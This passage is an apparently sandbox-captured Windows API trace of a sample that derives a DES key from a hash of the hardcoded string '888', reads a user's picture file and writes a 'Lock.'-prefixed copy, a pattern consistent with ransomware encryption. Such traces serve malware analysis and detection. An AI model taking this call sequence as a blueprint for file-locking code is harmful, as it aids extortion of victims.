lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7020, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.551] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7ca18) returned 1 [0209.551] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0209.551] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0209.552] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.552] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.552] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0209.552] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0209.552] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.552] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.552] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.552] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.553] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.553] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.553] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.553] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.553] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.553] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab1a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0209.553] CryptCreateHash (in: hProv=0xa7ca18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0209.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.554] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.554] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.554] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.554] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0209.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab380, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0209.554] CryptHashData (hHash=0x9e1bf8, pbData=0x2a71d28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.554] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.554] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.554] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.554] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.554] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab380, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.554] CryptDeriveKey (in: hProv=0xa7ca18, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0209.555] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.555] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.555] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0209.556] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/D7Vw ag.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d7vw ag.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0209.556] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.556] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0209.556] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0209.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.557] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0209.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.557] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74628 [0209.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.558] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0209.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0209.558] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0209.558] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0209.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0209.559] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.D7Vw ag.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.d7vw ag.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0209.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.560] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0209.560] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0209.560] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0209.560] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.561] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ee020 [0209.564] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0209.564] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x1096, lpOverlapped=0x0) returned 1 [0209.565] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0209.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1096) returned 0x2a9a940 [0209.566] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ee020 | out: hHeap=0x2af0000) returned 1 [0209.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.568] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1096) returned 0x2a9b9e0 [0209.568] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1096) returned 0x2a9a940 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0209.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0209.569] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.569] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0209.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0209.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1096) returned 0x2a9a940 [0209.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 